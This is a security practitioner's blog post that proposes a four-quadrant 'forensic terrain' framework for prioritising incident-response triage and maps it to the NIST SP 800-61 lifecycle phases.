There is a moment every SOC analyst knows. The alert fires, the clock starts, and the first question is not “what happened” but “where do I look.” That question has no clean answer in the published literature. NIST SP 800-61 tells you the phases. MITRE ATT&CK tells you the techniques. The Diamond Model tells you the actors. None of them tell you, in the moment of triage, which direction to point your eyes first and why.
This post introduces a decision framework built around a single organizing principle: forensic terrain. Not threat terrain. Not attack surface. Terrain, in the military sense of the word, meaning ground you can stand on, ground the adversary occupies, ground you can see from where you are standing, and ground that is obscured. An analyst making decisions at 2am during an active incident needs to know which terrain belongs to them, which terrain is contested, which terrain requires an intermediary to reach, and which terrain is effectively unreachable regardless of how important it looks on a diagram.
The framework emerged from notes on the non-forensic attribution work I contributed to while teaching at Purdue and work I did in the IC 1, 2, 3, 4, 5, and others. This stands on the shoulders of work by Andrew Pendergast and Christopher Betz, among others, in the period before their Diamond Model of Intrusion Analysis became the widely cited version of that thinking. The Diamond Model as published solved an attribution problem. This framework solves a different problem entirely: where does a working analyst start, and why does that order matter.
The Two Axes
The framework uses two axes. The first separates internal network space from external network space. The second separates assets and artifacts the defender controls from assets and techniques the adversary leverages. Those two axes produce four quadrants, and each quadrant has a distinct forensic character.
The language matters here. The adversary quadrants do not say “adversary controls” for internal assets. That framing is wrong and getting it wrong costs analysts time during incidents. When an adversary is living off the land inside your network, running PowerShell under a legitimate account, abusing WMI, hijacking a scheduled task that existed before they arrived, they do not control those resources. You do. You can pull the drive. You can image the system. You can kill the process. What the adversary holds is not control. They hold opacity. They planted something in territory you own, and they are counting on you not finding it before they finish what they came to do. That is an information asymmetry problem, not a control problem. The distinction matters because it changes the mission. You are not trying to take back control. You never lost it. You are closing a knowledge gap.
Internal / Defender Controls
This quadrant holds everything the organization generated, stored, and configured. Authentication logs, SIEM data, memory contents on live systems, file system metadata, registry hives, network flow data, PCAP if you are capturing it, group policy objects, certificate stores, backup snapshots, asset inventory, change management records, browser artifacts, email stores. The forensic richness here is unmatched anywhere else on the terrain map. This is also where the incident almost certainly surfaced. An alert fired from this quadrant. A correlation rule tripped. A user called the help desk. The analyst is already standing here when the clock starts.
The first priority in triage belongs here. Not because it is most important in some abstract sense. Because this is the ground the analyst can actually stand on, and because establishing a clean timeline from these artifacts is the prerequisite for everything else the investigation will attempt.
Internal / Adversary-Leveraged
This quadrant is the active battlefield. The adversary is not here with their own equipment. They arrived with your credentials, your tools, and your trust. PowerShell. WMI. Scheduled tasks that already existed. Legitimate remote access software. Accounts that cleared your authentication policies because they were supposed to. The techniques documented across the LOLBAS catalog represent an adversary strategy built entirely around this quadrant: bring nothing, take everything, and leave artifacts that look like Tuesday’s administrative work.
The forensic mission here is not eviction. The adversary does not own the hardware. The mission is detection and reconstruction. Every LOTL technique produces artifacts on systems the analyst controls physically and logically. The scheduled task is on your endpoint. The WMI subscription lives in your registry. The PowerShell logs, if you configured them, are in your event store. The adversary’s advantage is that they knew what they planted and you do not yet. Close that gap and the terrain reverts entirely to your control.
Evidence in this quadrant degrades faster than anywhere else. Process memory evaporates on reboot. Running tokens expire. In-flight lateral movement sessions terminate. This is the highest-volatility ground on the map, which is why it earns priority two in triage despite not being where the investigation starts.
External / Defender Controls
This quadrant holds the organization’s external posture. BGP announcements and ASN registration. PKI infrastructure and certificate transparency logs. Cloud tenancy and IAM configurations. MFA systems. Email authentication records. WAFs and managed perimeter services. Threat intelligence sharing relationships. Legal and law enforcement contacts. The domain names and DNS records the organization owns and operates.
Analysts underweight this quadrant during triage. The perimeter infrastructure is not going to disappear while you work the internal investigation, and its forensic artifacts do not degrade on the timescale of memory or live session data. That stability is why it sits at priority three. It is important, but it is patient. The work here during an active incident is less forensic investigation than tactical hardening: blocking known C2 infrastructure at the perimeter, verifying MFA is holding, confirming firewall rules are current. The goal is stopping the bleeding at the boundary while the real investigative work happens inside.
One dimension of this quadrant practitioners consistently underutilize is the law enforcement and legal contact network. If the incident has a reportable dimension, the clock on notification obligations starts the moment certain thresholds are crossed. Knowing who to call and having that relationship established before an incident is preparation work that belongs here.
External / Adversary Controls
This quadrant contains everything the adversary actually owns. C2 servers. Exfiltration drop zones. Ransomware encryption keys. Phishing infrastructure. Exploit staging servers. Bulletproof hosting relationships. Anonymization infrastructure. Cryptocurrency wallets used for ransom payments or tool purchases. Stolen credential markets where your users’ passwords may already be sitting. And something analysts frequently forget to put on the map: the adversary’s prior reconnaissance knowledge of your environment. If they did passive recon six months before the incident you are currently investigating, they may know things about your network topology that you have since changed and forgotten.
The defining characteristic of this quadrant is inaccessibility. The analyst cannot touch any of it directly. This is not a failure of capability. It is a structural feature of the terrain. The correct response to this quadrant during triage is not investigation but intelligence production: correlating known indicators against your outbound traffic and DNS queries, and passing developed indicators to your threat intelligence relationships and law enforcement contacts. That passing of indicators to external parties is the primary action available in this quadrant. Everything else here requires someone else to act on your behalf.
The Priority Sequence
The sequence follows access, not importance. You work what you can touch first.
Start with the internal / defender-controlled quadrant to establish timeline and ground truth. Without a clean timeline from your own logs, the rest of the investigation is hypothesis without foundation.
Move to the internal / adversary-leveraged quadrant because the threat is active there and the evidence is evaporating. Every minute spent elsewhere while a LOTL technique is running is a minute the adversary’s foothold deepens and the artifacts degrade.
Address the external / defender-controlled quadrant to harden the boundary in real time. This is operational rather than investigative work at this stage, but it matters.
Develop the external / adversary-controlled quadrant last during triage, not because it is unimportant but because you cannot act on it directly. Feed what you find to the people who can.
Scoring the Terrain
Three dimensions characterize each quadrant’s forensic value at any given moment: analyst access, evidence volatility, and containment leverage.
Analyst access measures how much direct control the analyst has over the artifacts. The internal / defender quadrant scores highest. The external / adversary quadrant scores lowest, effectively zero for direct action.
Evidence volatility measures how fast useful forensic material degrades or disappears. The adversary-leveraged internal quadrant scores highest here. Memory contents, running tokens, live session data, and in-flight lateral movement can vanish in minutes. The external / defender quadrant scores lowest, because your certificate infrastructure and firewall rules are not going anywhere on their own.
Containment leverage measures how much acting on a quadrant reduces the adversary’s ability to continue operating. The adversary-leveraged internal quadrant scores highest here too, because disrupting an active LOTL technique directly interrupts the current operation. This is why it ranks second in triage priority despite lower analyst access than the internal / defender quadrant.
When you weight access and volatility at double the weight of leverage, the internal quadrants dominate the early phases of incident response. When you reverse the weighting for post-incident threat hunting and deterrence work, the external adversary quadrant rises significantly. The terrain does not change. The analysis priorities do, depending on the phase of work.
Mapping to the NIST Incident Response Lifecycle
The framework behaves differently across each phase of the NIST SP 800-61 lifecycle. Understanding how the quadrant activity profiles shift across phases is what makes this a lifecycle tool rather than a static taxonomy.
Preparation is almost entirely your two quadrants. The adversary-leveraged quadrant scores near zero because there is no active compromise yet. The external adversary quadrant earns a small contribution through threat intelligence consumption: ingesting known TTPs and infrastructure to build detection logic and populate playbooks. The work of preparation is building visibility into your own terrain before the adversary arrives.
Detection and Analysis is where this framework lives. Both internal quadrants are fully engaged. The external adversary quadrant earns its highest score during this phase on IOC correlation: matching known adversary infrastructure against your outbound traffic, DNS queries, and SIEM data. This is the phase the quad chart was built to support.
Containment is when the external / defender quadrant finally earns its moment. C2 blocking at the perimeter, firewall rule updates, DNS sinkholes, MFA enforcement, credential revocation at scale. The adversary-leveraged quadrant remains high because containment requires identifying and shutting down the specific techniques actively running inside your environment. The external adversary quadrant drops near zero, because you still cannot touch their infrastructure.
Eradication is the one phase where the adversary-leveraged quadrant is the primary work surface. Every persistence artifact the adversary planted inside your systems, every modified scheduled task, every hijacked service, every stolen credential still valid in your environment, is something that exists on hardware you control. Cleaning it requires knowing exactly what normal looks like, which is why the internal / defender quadrant stays high for baseline verification. This phase is entirely an inside job.
Recovery mirrors Preparation in shape. You are rebuilding posture from clean baselines. The adversary-leveraged quadrant earns one high score here on re-infection monitoring. You need to watch for the same techniques re-emerging, which means maintaining detailed knowledge of what those techniques looked like in your specific environment.
Post-Incident Activity is the only phase where the external adversary quadrant earns meaningful scores across multiple dimensions. CTI sharing, attribution analysis, and indicator dissemination are the work of this phase. What you learned about their infrastructure, their tooling, and their TTPs goes out to your ISAC relationships, your law enforcement contacts, and back into your threat intelligence feeds to improve the next cycle’s Preparation phase. The loop closes here.
On Provenance and Tools
This framework draws on work I built during my time at Purdue. What I have described here solves investigator orientation. The literature has not adequately addressed how to investigate where courses like SANS teach tools, very few places say this is how you run an investigation.
So what about AI slop? Every idea here is something I’ve lectured on, written about in some way or case, and long before AI showed up. The use of AI is consistent with the AI statement on my blog. AI assisted the production of this post. It performed a literature search faster than I could manually, rendered the visualization work, and handled transcription while my partially paralyzed left hand made typing impractical today (I’ve a pinched nerve, don’t be a drama queen).
Every analytical position in this framework, the adversary-leveraged framing, the information asymmetry characterization, the access-based prioritization sequence, and the recognition that evidence volatility and containment leverage require separate scoring dimensions came from the human cognition behind this blog. AI did not generate those positions. It responded to them. Thinking about the “AI wrote that,” I realized AI isn’t doing as much work as my graduate students did, it drinks way less, and I never get called about bail money.
That is an honest account of how this was produced. The reader can judge the framework on its merits
The Core Claim
Forensic terrain analysis is not a novel academic contribution. It is a practitioner’s tool. The quad chart exists to answer one question under time pressure: where do I look first, and why does that order matter. The answer is access. You work the ground you can stand on. You work the volatile evidence before it disappears. You harden the boundary while the internal investigation runs. You feed indicators outward to the people who can act on the terrain you cannot reach.
The adversary’s advantage inside your network is not control. It is knowledge. They know what they planted. You do not yet. That gap is closeable. The terrain was always yours.
Dr. Sam Liles writes at sveoti.net. He serves as Captain, Writer, and CISO. His intelligence analysis publication EOTISEC produces ICD 203/206/503-compliant national security business intelligence reports available by subscription.
About the Author
